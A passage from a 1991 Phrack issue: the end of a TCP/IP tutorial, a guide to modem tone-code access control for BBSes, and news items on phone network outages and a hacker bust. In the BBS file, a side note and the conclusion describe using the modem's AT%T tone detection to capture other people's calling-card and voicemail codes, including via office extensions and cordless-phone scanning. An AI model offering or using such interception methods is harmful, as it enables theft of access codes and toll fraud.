  2277.    the UDP datagram from IP it examines the UDP checksum.  If the
  2278.    checksum is zero, it means that checksum was not calculated by the
  2279.    sender and can be ignored.  Thus the sending computer's UDP module
  2280.    may or may not generate checksums.  If Ethernet is the only network
  2281.    between the 2 UDP modules communicating, then you may not need
  2282.    checksumming.  However, it is recommended that checksum generation
  2283.    always be enabled because at some point in the future a route table
  2284.    change may send the data across less reliable media.
  2285.  
  2286.    If the checksum is valid (or zero), the destination port number is
  2287.    examined and if an application is bound to that port, an application
  2288.    message is queued for the application to read.  Otherwise the UDP
  2289.    datagram is discarded.  If the incoming UDP datagrams arrive faster
  2290.    than the application can read them and if the queue fills to a
  2291.    maximum value, UDP datagrams are discarded by UDP.  UDP will continue
  2292.    to discard UDP datagrams until there is space in the queue.
  2293.  
  2294. 7.  Transmission Control Protocol
  2295.  
  2296.    TCP provides a different service than UDP.  TCP offers a connection-
  2297.    oriented byte stream, instead of a connectionless datagram delivery
  2298.    service.  TCP guarantees delivery, whereas UDP does not.
  2299.  
  2300.    TCP is used by network applications that require guaranteed delivery
  2301.    and cannot be bothered with doing time-outs and retransmissions.  The
  2302.    two most typical network applications that use TCP are File Transfer
  2303.    Protocol (FTP) and the TELNET.  Other popular TCP network
  2304.    applications include X-Window System, rcp (remote copy), and the r-
  2305.    series commands.  TCP's greater capability is not without cost: it
  2306.    requires more CPU and network bandwidth.  The internals of the TCP
  2307.    module are much more complicated than those in a UDP module.
  2308.  
  2309.    Similar to UDP, network applications connect to TCP ports.  Well-
  2310.    defined port numbers are dedicated to specific applications.  For
  2311.    instance, the TELNET server uses port number 23.  The TELNET client
  2312.    can find the server simply by connecting to port 23 of TCP on the
  2313.    specified computer.
  2314.  
  2315.    When the application first starts using TCP, the TCP module on the
  2316.    client's computer and the TCP module on the server's computer start
  2317.    communicating with each other.  These two end-point TCP modules
  2318.    contain state information that defines a virtual circuit.  This
  2319.    virtual circuit consumes resources in both TCP end-points.  The
  2320.    virtual circuit is full duplex; data can go in both directions
  2321.    simultaneously.  The application writes data to the TCP port, the
  2322.    data traverses the network and is read by the application at the far
  2323.    end.
  2324.  
  2325.    As with all sliding window protocols, the protocol has a window size.
  2326.    The window size determines the amount of data that can be transmitted
  2327.    before an acknowledgement is required.  For TCP, this amount is not a
  2328.    number of TCP segments but a number of bytes.
  2329.  
  2330. 8.  Network Appliations
  2331.  
  2332.    Why do both TCP and UDP exist, instead of just one or the other?
  2333.  
  2334.    They supply different services.  Most applications are implemented to
  2335.    use only one or the other.  You, the programmer, choose the protocol
  2336.    that best meets your needs.  If you need a reliable stream delivery
  2337.    service, TCP might be best.  If you need a datagram service, UDP
  2338.    might be best.  If you need efficiency over long-haul circuits, TCP
  2339.    might be best.  If you need efficiency over fast networks with short
  2340.    latency, UDP might be best.  If your needs do not fall nicely into
  2341.    these categories, then the "best" choice is unclear.  However,
  2342.    applications can make up for deficiencies in the choice.  For
  2343.    instance if you choose UDP and you need reliability, then the
  2344.    application must provide reliability.  If you choose TCP and you need
  2345.    a record oriented service, then the application must insert markers
  2346.    in the byte stream to delimit records.
  2347.  
  2348.    What network aplications are available?
  2349.  
  2350.    There are far too many to list.  The number is growing continually.
  2351.    Some of the applications have existed since the beginning of internet
  2352.    technology: TELNET and FTP.  Others are relatively new: X-Windows and
  2353.    SNMP.  The following is a brief description of the applications
  2354.    mentioned in this tutorial.
  2355.  
  2356. 8.1  TELNET
  2357.  
  2358.    TELNET provides a remote login capability on TCP.  The operation and
  2359.    appearance is similar to keyboard dialing through a telephone switch.
  2360.    On the command line the user types "telnet delta" and receives a
  2361.    login prompt from the computer called "delta".
  2362.  
  2363.    TELNET works well; it is an old application and has widespread
  2364.    interoperability.  Implementations of TELNET usually work between
  2365.    different operating systems.  For instance, a TELNET client may be on
  2366.    VAX/VMS and the server on UNIX System V.
  2367.  
  2368. 8.2  FTP
  2369.  
  2370.    File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has
  2371.    widespread interoperability.  The operation and appearance is as if
  2372.    you TELNETed to the remote computer.  But instead of typing your
  2373.    usual commands, you have to make do with a short list of commands for
  2374.    directory listings and the like.  FTP commands allow you to copy
  2375.    files between computers.
  2376.  
  2377. 8.3  rsh
  2378.  
  2379.    Remote shell (rsh or remsh) is one of an entire family of remote UNIX
  2380.    style commands.  The UNIX copy command, cp, becomes rcp.  The UNIX
  2381.    "who is logged in" command, who, becomes rwho.  The list continues
  2382.    and is referred to collectively to as the "r" series commands or the
  2383.    "r*" (r star) commands.
  2384.  
  2385.    The r* commands mainly work between UNIX systems and are designed for
  2386.    interaction between trusted hosts.  Little consideration is given to
  2387.    security, but they provide a convenient user environment.
  2388.  
  2389.    To execute the "cc file.c" command on a remote computer called delta,
  2390.    type "rsh delta cc file.c".  To copy the "file.c" file to delta, type
  2391.    "rcp file.c delta:".  To login to delta, type "rlogin delta", and if
  2392.    you administered the computers in a certain wa, you will not be
  2393.    challenged with a password prompt.
  2394.  
  2395. 8.4  NFS
  2396.  
  2397.    Network File System, first developed by Sun Microsystems Inc, uses
  2398.    UDP and is excellent for mounting UNIX file systems on multiple
  2399.    computers.  A diskless workstation can access its server's hard disk
  2400.    as if the disk were local to the workstation.  A single disk copy of
  2401.    a database on mainframe "alpha" can also be used by mainframe "beta"
  2402.    if the database's file system is NFS mounted commands to
  2403.    use the NFS mounted disk as if it were local disk.
  2404.  
  2405. 8.5  SNMP
  2406.  
  2407.    Simple Network Management Protocol (SNMP) uses UDP and is designed
  2408.    for use by central network management stations.  It is a well known
  2409.    fact that if given enough data, a network manager can detect and
  2410.    diagnose network problems.  The central station uses SNMP to collect
  2411.    this data from other computers on the network.  SNMP defines the
  2412.    format for the data; it is left to the central station or network
  2413.    manager to interpret the data.
  2414.  
  2415. 8.6  X-Window
  2416.  
  2417.    The X Window System uses the X Window protocol on TCP to draw windows
  2418.    on a workstation's bitmap display.  X Window is much more than a
  2419.    utility for drawing windows; it is entire philosophy for designing a
  2420.    user interface.
  2421.  
  2422. 9.  Other Information
  2423.  
  2424.    Much information about internet technology was not included in this
  2425.    tutorial.  This section lists information that is considered the next
  2426.    level of detail for the reader who wishes to learn more.
  2427.  
  2428.      o administration commands: arp, route, and netstat
  2429.      o ARP: permanent entry, publish entry, time-out entry, spoofing
  2430.      o IP route table: host entry, default gateway, subnets
  2431.      o IP: time-to-live counter, fragmentation, ICMP
  2432.      o RIP, routing loops
  2433.      o Domain Name System
  2434.  
  2435. 10.  References
  2436.  
  2437.    [1] Comer, D., "Internetworking with TCP/IP Principles, Protocols,
  2438.        and Architecture", Prentice Hall, Englewood Cliffs, New Jersey,
  2439.        U.S.A., 1988.
  2440.  
  2441.    [2] Feinler, E., et al, DDN Protocol Handbook, Volume 2 and 3, DDN
  2442.        Network Information Center, SRI International, 333 Ravenswood
  2443.        Avenue, Room EJ291, Menlow Park, California, U.S.A., 1985.
  2444.  
  2445.    [3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems
  2446.        Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990.
  2447.  
  2448. 11.  Relation to other RFCs
  2449.  
  2450.    This RFC is a tutorial and it does not UPDATE or OBSOLETE any other
  2451.    RFC.
  2452.  
  2453. 12.  Security Considerations
  2454.  
  2455.    There are security considerations within the TCP/IP protocol suite.
  2456.    To some people these considerations are serious problems, to others
  2457.    they are not; it depends on the user requirements.
  2458.    This tutorial does not discuss these issues, but if you want to learn
  2459.    more you should start with the topic of ARP-spoofing, then use the
  2460.    "Security Considerations" section of RFC 1122 to lead you to more
  2461.    information.
  2462.  
  2463. 13.  Authors' Addresses
  2464.  
  2465.    Theodore John Socolofsky
  2466.    EMail: TEDS@SPIDER.CO.UK
  2467.  
  2468.    Claudia Jeanne Kale
  2469.    EMail: CLAUDIAK@SPIDER.CO.UK
  2470.  
  2471.    Note:  This info taken from RFC-1180.
  2472. _______________________________________________________________________________
  2473.  
  2474.  
  2475.  
  2476.  
  2477.                                 ==Phrack Inc.==
  2478.  
  2479.                 Volume Three, Issue Thirty-four, File #9 of 11
  2480.  
  2481.               ._._._._._._._._._._._._._._._._._._._._._._._._.
  2482.               !                                               !
  2483.               !      Advanced Modem-Oriented BBS Security     !
  2484.               !                                               !
  2485.               !          By Laughing Gas and Dead Cow         !
  2486.               !                                               !
  2487.               !     Written Exclusively for PHRACK 8/22/91    !
  2488.               !_._._._._._._._._._._._._._._._._._._._._._._._!
  2489.  
  2490.  
  2491. * Introduction =-= Things you need to know *
  2492.  
  2493. This is an introduction and guide to setting up your BBS and modem so that a
  2494. caller must know a certain code and append it to his dialing string in order to
  2495. access the BBS.  This lets you have yet another way (besides newuser passwords,
  2496. etc) to lock out unwanted callers.
  2497.  
  2498. You can also set a certain pattern for your board's numerical code based on the
  2499. day or the month or something, and distribute this pattern instead of having to
  2500. distribute the access code.
  2501. You must have an intelligent modem to be able to run a board which requires the
  2502. access method I'm going to be discussing in this file.  However you don't need
  2503. an intelligent modem to be able to call the same board, but you do have to
  2504. enter the code manually if you do not have an intelligent modem.  (So only
  2505. certain people can run a board with this method of access control, but >almost<
  2506. anyone can call one.)
  2507.  
  2508. All modem commands in this manual will be hayes 'AT' style commands, and some
  2509. may be available only to USRobotics Courier modems with v.42bis, or certain
  2510. other intelligent modems.  If you can't get it to work with your modem, your
  2511. modem may not be able to do it, but try looking in your modem manual, just in
  2512. case.
  2513.  
  2514. NOTE: The ONLY modem that this method has been tested with is a USRobotics
  2515. Courier HST modem, (the new kind) with the v.42bis.  I tested it with my modem
  2516. which is an older HST (14.4, but no v.42bis) and it did NOT accept the AT%T
  2517. command (it returned "ERROR"). Check page 83 of your HST manual for more info,
  2518. or type AT%$ for on-line help from the modem firmware. (about as helpful as the
  2519. manual, and neither are very detailed.)
  2520.  
  2521. Things to know:
  2522.         ATDT1234567;    This command causes your modem to dial 1234567 and
  2523.                        then return to command mode.
  2524.         ATDT1234567@1;  This command causes your modem to dial 1234567, wait for
  2525.                         an answer, dial 1 and return to command mode.
  2526. |-----> AT%T            This command causes every tone that goes into the modem
  2527. |                       to be identified and followed with a 0.
  2528. |
  2529. |---------------------- This is the key to the whole enchilada.
  2530.  
  2531. Alternate commands may be available depending on your modem type.
  2532.  
  2533. * Concept =-= How-To
  2534.  
  2535. The concept for the bbs access code would be as follows.
  2536.  
  2537. The caller dials the number to the BBS, when the BBS picks up, it sends a
  2538. digit, then the caller sends a responding set of digits.  If the digits which
  2539. the caller sends match the access code for the BBS, the BBS will send an answer
  2540. tone and the caller's modem will acknowledge and connection.
  2541.  
  2542. How it works is like this:
  2543.  (Sample Transcript)
  2544.  
  2545. CALLER> ATDT1234567@234
  2546.    BBS> RING
  2547.    BBS> ATDT1;
  2548.    BBS> OK
  2549.    BBS> AT%T
  2550.    BBS> 203040
  2551.    BBS> ATA
  2552.  
  2553. What happens is the caller dials 1234567 (the number of the BBS) the '@' tells
  2554. the callers modem to wait for a result (which is received when the BBS gets a
  2555. ring and sends a 1) then the callers modem dials 234 (the access code) after
  2556.  
  2557. the BBS sent the '1' it got a OK so it sent a AT%T which told it to monitor
  2558. tones.  This command returned "203040" which is 234 followed by 0's (the format
  2559. of the output of AT%T) the BBS software would have to watch for this string.
  2560. Since 234 was the right code, the board sent an ATA which would connect the
  2561. caller since it's dial command was still open.  If 234 hadn't been the code,
  2562. then the BBS would have sent a ATH0.
  2563.  
  2564. * Manual Dialing =-= Lame modems *
  2565.  
  2566. Anyway, if you don't have a modem that does the AT%T or ATDT1; commands you
  2567. CANNOT run a BBS with this type of security, unless your modem has EQUIVALENT
  2568. commands, or you can figure out a way to do it with the commands your modem
  2569. has.  The toughest part is the reading of tones, which, as far as I know, is
  2570. unique to the HST/Courier modems.
  2571.  
  2572. However, if your modem does not do the ATDT1@1 thing, then you can PROBABLY
  2573. still call a board using this security.  This is assuming you can just send a
  2574. "dial command" to your modem without a number (ie ATD on an HST.)  What you do
  2575. is dial the BBS number manually, then you'll here a beep, you dial the code,
  2576. then send the dial command to your modem and put the phone down.  This should
  2577. connect you in the same fashion.. (ie..)
  2578.  
  2579. CALLER> manually dials BBS
  2580.    BBS> ATDT1;
  2581. CALLER> hears beep and dials 234, then sends ATD to his modem and puts the
  2582.         phone down.
  2583.    BBS> OK
  2584.    BBS> AT%T
  2585.    BBS> 203040
  2586.    BBS> ATA
  2587. CALLER> his modem connects.
  2588.  
  2589. * Bells and Whistles =-= Wrapping It Up *
  2590.  
  2591. Your options when using this type of security.  There are many different things
  2592. you can do.
  2593.  
  2594. Method #1: You can say "Hey, the access code for my board is 234" and give
  2595. that to the people you want to call.
  2596.  
  2597. Method #2: Set a pattern for your access codes.  Say, the date (ie, for today,
  2598. 8-22-91 the code would be 082291), or you could get more complex (add one to
  2599. each digit, run it through an algorithm, etc)
  2600.  
  2601. Method #3: Distribute a program that generates the code based on the day, the
  2602. month, what have you.  (However this is only a solution if you can either
  2603. distribute a program like this to EVERY type of operating system, or you only
  2604. want callers from one operating system (or several, the only ones you can
  2605. produce it for..)
  2606.  
  2607. Method #4: Have the BBS accept several codes, and give out  different code to
  2608. each class of users (say, newusers to apply = 1234, validated = 2345, elite =
  2609. 3456) or something like that, this would allow for control of who calls when,
  2610. as well as logging of call class frequency, etc.
  2611.  
  2612. Method #5: Have a specific code for each user.  This would take a lot of
  2613. maintenance, but would provide for a VERY secure BBS environment.  This would
  2614. allow the same advantages above as well (logging, freq. etc).
  2615.  
  2616. Things to keep in mind however are if you have an access code generated by a
  2617. program or by the date, etc. you have to change the code whenever the program
  2618. would.
  2619.  
  2620. An interesting side note here is that the AT%T command can be used to call a
  2621. COCOT (private payfone) and record the tones, or possibly to record codes other
  2622. people entered, etc.  (Ie, bring your laptop with modem to a office, attach
  2623. it to an extension and wait for a person to pick up, issue the ATD; command
  2624. right away, then AT%T command.  If the person dials a 950, you should get
  2625. something like
  2626.  
  2627.         90500010003030 (pause) 203040506070
  2628.  
  2629. that is assuming the code is 234567.  Congratulations, you now have their code.
  2630. The modem can recognize the dtmf tones for 0-9, *, #, and the silver box tones
  2631. A, B, C, and E.  I'm sure other interesting uses for this feature can be
  2632. found, and I'd love to hear from the other people out there in the h/p world.
  2633.   I'm sure a lot of you have seen me around, for those that haven't I can be
  2634. reached on my board, Solsbury Hill or Ripco (312) or on Internet as
  2635. lgas@doomsday.spies.com.
  2636.  
  2637. (Note: Spies is down as of this writing, I have some other accounts, but I'd
  2638. prefer that most of them remain unknown... if anyone wants to offer me an
  2639. account I can use just for mail where I can have my alias for the account
  2640. name, on a stable system, please contact me.)
  2641.  
  2642.  
  2643. * Non-BBS Oriented Stuff =-= Conclusion *
  2644.  
  2645. In some issue of 2600 magazine someplace at some time they published an article
  2646. on how to build a tone detection device: Now you have your own, built in to the
  2647. modem.
  2648.  
  2649. An example application of this "in the field" would be calling a COCOT and
  2650. using the modem to decipher the tones.  That would be done:
  2651.  
  2652. ATDT3014283268;                      ;call the COCOT
  2653. AT%T                                 ;get tones
  2654.  
  2655. it should respond with the decoded tones.
  2656.  
  2657. You could fool around with it and get it to accept input from a tape recorder,
  2658. this gives you a way to decipher recorded VMB passcodes, or phone numbers, or
  2659. anything else that was recorded as it was dialed. Or use it with a radio
  2660. scanner set to scan the freqs that cordless fones operate on, and record those
  2661. tones. Then play 'em back into the modem and they're yours.
  2662.  
  2663. In conclusion... (ahem).. This is an area which I believe has never been
  2664. breached before, and this idea was brought to you by THUGS.  As long as
  2665. technology keeps advancing, we'll be here to bring you the latest tricks such
  2666. as this one.  Please contact me if you have any information about this area
  2667. (tone detection via modem, or anything relating to it at all..) especially if
  2668. you know of modems besides the v.42bis models of USRobotic's HSTs that can do
  2669. this.
  2670.  
  2671. Laughing Gas
  2672. Solsbury Hill BBS (301-428-3268)
  2673. _______________________________________________________________________________
  2674.  
  2675.  
  2676.  
  2677.                                ==Phrack Inc.==
  2678.  
  2679.                 Volume Three, Issue Thirty-Four, File #10 of 11
  2680.  
  2681.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2682.               PWN                                             PWN
  2683.               PWN              Phrack World News              PWN
  2684.               PWN                                             PWN
  2685.               PWN           Issue XXXIV / Part One            PWN
  2686.               PWN                                             PWN
  2687.               PWN            Compiled by Dispater             PWN
  2688.               PWN                                             PWN
  2689.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2690.  
  2691.  
  2692. What We Have Got Here Today is Failure to Communicate
  2693. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2694. Editors Comment: Dispater
  2695.  
  2696.      With hundreds, maybe thousands of lives at stake, three airports in New
  2697. York had to shut down due to a long distance carrier failing.  It is absolutely
  2698. amazing how irresponsible these services were to rely on only on form of
  2699. communication.  Where was the back up system?  This incident might not have
  2700. happened it they would have had an alternative carrier or something as simple
  2701. as two way radios.
  2702.  
  2703.      Many people are running around these days screaming about how
  2704. irresponsible AT&T was.  The real problem lyes with people in our society
  2705. failing to take the time to learn fundamental aspects of the common technology.
  2706.  
  2707.      It is also a shame that the people "in control" were incapable of using
  2708. something as simple as a "port" to dial through another extender.  This
  2709. is the kind of thing that happens when people choose to isolate themselves
  2710. from the technological society we have today.
  2711.  
  2712.      What follows is a compilation of several articles dealing with AT&T long
  2713. distance carrier failures.
  2714.  
  2715. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2716.  
  2717. Thank You for abUsing AT&T                                     October 18, 1991
  2718. ~~~~~~~~~~~~~~~~~~~~~~~~~
  2719. by Kimberly Hayes Taylor and Steve Marshall (USA Today "Phone Failure Stalls
  2720.    Air Traffic Disruption in N.Y. Felt Nationwide")
  2721.  
  2722.      Air traffic in and out of New York City resumed late Tuesday after a
  2723. phone-service failure virtually shut down three airports for almost four
  2724. hours.  Hundreds of flights coast to coast were delayed or canceled when
  2725. controllers at John F. Kennedy, La Guardia and Newark (New Jersey) airports
  2726. lost the link that allows communication among themselves or with other U.S.
  2727. airports.  Communications between pilots and air-traffic controllers travel
  2728. over telephone lines to ground-based radio equipment.  AT&T spokesman Herb
  2729. Linnen blamed an internal power failure in a long-distance switching office
  2730. in Manhattan.  Hours after the 4:50 PM EDT failure, 40 planes loaded with
  2731. passengers were sitting on the runway at Kennedy, 35 at Newark, 30 at La
  2732. Guardia.  "During the height of the thing, at least 300 aircraft were delayed
  2733. at metropolitan airports," said Bob Fulton, a spokesperson for the Federal
  2734. Aviation Administration.  Included: flights taking off "from California to
  2735. Florida" and headed for New York, said FAA's Fred Farrar.  Farrar said planes
  2736. had to be grounded for safety.  Without telephone communication, they would
  2737. "fly willy-nilly."  Among diverted flights: a British Airways supersonic
  2738. Concorde from London, which landed at Bradley airport outside Hartford, Conn.
  2739. Passenger reaction:  at Washington's National Airport, Dominique Becoeur of
  2740. Paris was "reading, drinking, and thinking" while waiting for a flight to New
  2741. York.  At La Guardia, Ernie Baugh, of Chattanooga, Tenn., said, "I think I
  2742. will go and have another beer."  Flights were reported resuming by 9 p.m.
  2743. EDT.  Linnen said AT&T was busy Tuesday night restoring long-distance service
  2744. in and out of New York City, which had been interrupted.  Some international
  2745. service also had been affected.
  2746.  
  2747. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2748.  
  2749. AT&T's Hang Ups                                                October 19, 1991
  2750. ~~~~~~~~~~~~~~
  2751. By John Schneidawind (USA Today - "The Big Hang-Up Phone Crash Grounds
  2752.    Airplanes, Raises Anger")
  2753.  
  2754.      The Federal Administration Aviation has some good news for travelers who
  2755. were stranded at airports, or delayed for hours, the past two days by the New
  2756. York City telephone outage.  If a similar phone disaster strikes next month,
  2757. hardly any fliers will know the difference.  That's because AT&T is close to
  2758. completing installation of a network of microwave dishes that will
  2759. supplement, if not replace, the phone lines AT&T uses to relay calls between
  2760. air-traffic controllers in different cities.  Tuesday evening, flights in and
  2761. out of some of the nation's busiest airports - Kennedy, La Guardia, and
  2762. Newark, N.J. - were grounded because FAA controllers couldn't communicate
  2763. with one another.  For much of the 1980's, land-based fiber optic lines have
  2764. been slowly replacing microwave phone dishes phone companies long have used
  2765. to transmit telephone calls.  That's because fiber-optic wires were thought
  2766. to provide clearer calls than microwave technology.  Now, it's becoming
  2767. apparent that sending some or most telephone calls via wireless microwave
  2768. might ease the burden handled by fiber-optic cables.  In addition, a
  2769. microwave call could be transmitted point-to-point, bypassing an inoperative
  2770. switching center when a breakdown or catastrophe occurs.
  2771.  
  2772. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2773.  
  2774. Computer Maker Says Tiny Software Flaw Caused Phone Disruptions
  2775. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2776. by Edmund L Andrews (New York Times)
  2777.  
  2778.      WASHINGTON -- A manufacturer of telephone call-routing computers
  2779. said that a defect in three or four lines of computer code, rather than a
  2780. hacker or a computer "virus," appeared to be the culprit behind a mysterious
  2781. spate of breakdowns that disrupted local telephone service for 10 million
  2782. customers around the country in late June and early this month.
  2783.  
  2784.      In congressional testimony Tuesday, an official of the manufacturer, DSC
  2785. Communications of Plano, Texas, said all the problems had been traced to recent
  2786. upgrades in its software, which had not been thoroughly tested for hidden
  2787. "bugs."
  2788.      Although the telephone companies that experienced failures were using
  2789. slightly different versions of the software, the company said, each version was
  2790. infected with the flaw.  "Our equipment was without question a major
  2791. contributor to the disruptions," Frank Perpiglia, DSC's vice president for
  2792. technology and product development, told the House telecommunications
  2793. subcommittee.  "We must be forthright in accepting responsibility for
  2794. failure."
  2795.  
  2796.        Officials at both DSC and the regional Bell companies said they could
  2797. not entirely rule out the possibility of sabotage, but said the evidence points
  2798. strongly to unintentional errors. The flaws caused the computers to send a
  2799. flood of erroneous messages when the computer encountered routine maintenance
  2800. problems.
  2801.  
  2802. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2803.  
  2804. TELEPHONE TECHNOLOGY QUESTIONED AFTER FAILURES
  2805. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2806. by Edmund L. Andrew (New York Times)
  2807.  
  2808.      WASHINGTON -- Striking similarities between nearly simultaneous
  2809. computer malfunctions that disrupted local telephone service on the East Coast
  2810. and in Los Angeles on Wednesday have raised questions among communications
  2811. experts about the reliability of advanced networks that all the Bell telephone
  2812. companies are now installing.
  2813.  
  2814.      The problems experienced by both Pacific Bell and the Chesapeake and
  2815. Potomac Co., which serves Washington, Maryland, Virginia and parts of West
  2816. Virginia, involved computer programs on advanced call-routing equipment, which
  2817. uses the same new technology, one being adopted throughout the communications
  2818. industry.
  2819.  
  2820.      The problems, which were corrected in both areas by early evening on
  2821. Wednesday, made it impossible for about nine million telephone customers to
  2822. complete local telephone calls.
  2823.  
  2824.      Although the origins of both malfunctions remained unclear on Thursday,
  2825. the difficulties at the two companies bore a strong resemblance to a brief but
  2826. massive breakdown experienced by the American Telephone and Telegraph Co.'s
  2827. long-distance lines in January 1990.
  2828.  
  2829.      In all three cases, a problem at one switching center quickly corrupted
  2830. other switches and paralyzed much of the system. Perhaps the biggest fear,
  2831. federal regulators say, is that as telephone companies link their networks more
  2832. closely, malfunctions at one company can infect systems at other companies and
  2833. at long-distance carriers.
  2834.  
  2835.      "What you want to avoid is the situation where one system contaminates
  2836. another," said an investigator at the Federal Communications Commission who
  2837. insisted on anonymity.
  2838.  
  2839.      "I guess the ultimate concern is that software or hardware would be
  2840. deployed in a way that the corruption could be processed through entire
  2841. network, and there would be no alternatives available."
  2842.      As the telephone companies and government regulators tried to determine
  2843. more precisely on Thursday what went wrong, investigators at the communications
  2844. commission said they would also look at several other questions:
  2845.  
  2846.      Are there system wide problems that have gone unnoticed until now?  Can
  2847. telephone companies reduce risks by reducing their dependence on one type of
  2848. switching equipment?  Were the disruptions caused by computer operators outside
  2849. the telephone companies trying to sabotage the systems?
  2850.  
  2851.      Officials at both companies discounted the possibility that a computer
  2852. hacker might have caused the failures, and outside experts tended to agree.
  2853.  
  2854.      "There's always that possibility, but most likely it was some kind of
  2855. glitch or bug in the software," said A. Michael Noll, a professor at the
  2856. Annenberg School of Communications at the University of Southern California and
  2857. author of several textbooks on telecommunications technology.
  2858.  
  2859.      Several independent communications experts said the problems reflected
  2860. the difficulty of spotting all the hidden problems in complex software before
  2861. putting it into commercial use.
  2862.  
  2863.      "It's very hard to simulate all the possibilities in a laboratory," said
  2864. Richard Jay Solomon, a telecommunications consultant and research associate at
  2865. the Massachusetts Institute of Technology.  "You have to go out in the field
  2866. and keep your fingers crossed."
  2867.  
  2868.      As more information became available on Thursday, the two disruptions
  2869. appeared to be almost identical. The problem at Chesapeake & Potomac, a
  2870. subsidiary of the Bell Atlantic Corp., began as the company was increasing the
  2871. traffic being routed by one of its four signal processing computers. For
  2872. reasons that remain a mystery, the system began to malfunction about 11:40 a.m.
  2873.  
  2874.      The computer was supposed to shut itself down, allowing the traffic to
  2875. be handled by other computers. Instead, it sent out a barrage of erroneous
  2876. signals, apparently overwhelming the other two computers.  "It was as if bogus
  2877. information was being sent," said Edward Stanley, a company spokesman.
  2878.  
  2879.      The same thing seems to have occurred almost two hours later, at about 11
  2880. a.m., in Los Angeles, said Paul Hirsch, a spokesman for Pacific Bell, a
  2881. subsidiary of the Pacific Telesis Group.
  2882.  
  2883.      Hirsch said the problem began when one of four signal transfer points
  2884. signaled to the others that it was having problems. The other three computers
  2885. froze after being overloaded by signals the defective computer.
  2886.  
  2887.      Hirsch said his company continued to believe that the two telephone
  2888. incidents were completely unrelated.  "Someone wins the lottery every week,"
  2889. he said.  "Stranger things can happen."
  2890.  
  2891.      Officials at Chesapeake and Potomac said the problems were probably
  2892. unrelated.  Asked if hackers could have caused the problems, Ellen Fitzgerald,
  2893. a spokeswoman for Chesapeake and Potomac, said she had been assured that
  2894. the system could not be penetrated.  But, she added, "a few days ago I would
  2895. have told you that what happened yesterday wouldn't happen."
  2896.      Terry Adams, a spokesman at the DSC Communications Corp., which made
  2897. both systems, said company officials also discounted any connection between the
  2898. failures.
  2899. ______________________________________________________________________________
  2900.  
  2901.  
  2902.  
  2903.                                ==Phrack Inc.==
  2904.  
  2905.                 Volume Three, Issue Thirty-four, File #11 of 11
  2906.  
  2907.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2908.               PWN                                             PWN
  2909.               PWN             Phrack World News               PWN
  2910.               PWN                                             PWN
  2911.               PWN           Issue XXXIV,  Part Two            PWN
  2912.               PWN                                             PWN
  2913.               PWN            Compiled by Dispater             PWN
  2914.               PWN                                             PWN
  2915.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2916.  
  2917. Mind Rape or Media Rape?
  2918. ~~~~~~~~~~~~~~~~~~~~~~~
  2919. Special Thanks: Night Ranger
  2920.  
  2921. Thursday September 26, 1991  was no ordinary day for Mind Rape, a young Arizona
  2922. State college student.  When he finally made it home that day, he found his home
  2923. had been raided by the feds.  'They took EVERYTHING! Including my Metallica
  2924. tape!' he told me.  After talking to him for quite a while I learned a lot, not
  2925. just about his bust but about hacking in general.  He instructed me not to say
  2926. anything specifically on the advice of his lawyer and the EFF, but he did want
  2927. me to let the real reason he was busted be known - His electronic newsletter
  2928. entitled NSA (for National Security Anarchists).  Mind Rape has some very
  2929. important views on hacking that the government doesn't want others to hear.
  2930. Some of these views were contained in his newest and soon to be released
  2931. newsletter NSA issue number five, which was confiscated of course.  He was also
  2932. working on a book about hacker's philosophy, which was taken too.  He has not
  2933. yet been charged but in the eyes of the media he is already been tried and
  2934. found guilty.  It is unfortunate the general public gets its information from
  2935. news reports like the following because, as you can see, they can be quite
  2936. misleading.  Hopefully once Mind Rape gets everything straight he will continue
  2937. to write his book, after all it is his constitutional right to do so, and I
  2938. think it be quite informative to both the hackers of the nineties and the
  2939. outside world.
  2940.  
  2941. The following is a transcript of a news report covering his story...
  2942.  
  2943. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2944.  
  2945.      Male Announcer: That student is Donald _____ of Phoenix.  Officials of
  2946. LDL Long Distance believe he's one of around 20 hackers who've been ripping off
  2947. their company for fun and profit.  In tonight's Night Team Report we'll see how
  2948. this kind of thievery adds up.  The nation's telephone companies loose more
  2949. than a billion dollars a year to hackers.  Mark Nighten (sp?) a security
  2950. director for LDL Long Distance.  Last month he was poring through records like
  2951. these which convinced him to believe that someone was making hundreds of
  2952. computer generated phone calls to his company's 1-800 access line trying to get
  2953. customer's calling card codes.  He went to the Phoenix Police.  They got a
  2954. search warrant and traced the calls to a house near 18th Drive near Union
  2955. Hills.  Police went there last month and came away with a computer, software
  2956. and a list of phone codes, all belonging to 19 year old Donald _____ an ASU
  2957. student.   With nighten suspects _____ is just one of 20 hacker on his network
  2958. who can make thousands of dollars worth of calls which would wind up on other
  2959. people's phone bills.
  2960.  
  2961.      Mark: You can see the magnitude of this.  Off of one authorization code
  2962. you could have 10, maybe 150 other people...
  2963.  
  2964.      Male Announcer: Lemme ask ya...How bad are you getting ripped off here?
  2965.  
  2966.      Mark: We've had to have somebody on this 24 hours a day.  We've been
  2967. getting killed.
  2968.  
  2969.      Male Announcer: Hackers often sell the codes they steal to other students.
  2970. So that hundreds of students and Arizona State University and University of
  2971. Arizona also could be ripping of the company.  Students at Arizona State
  2972. University told me today that they have not herd of LDL's troubles, but they
  2973. confirmed that stolen phone codes do have a way of getting around.
  2974.  
  2975.      I iz a College Student: Someone hears...ya know...about the interest and
  2976. someone else knows somebody...ya know...and they tell you and you talk to
  2977. them and...ya know...it's not overly expensive or anything like that.
  2978.  
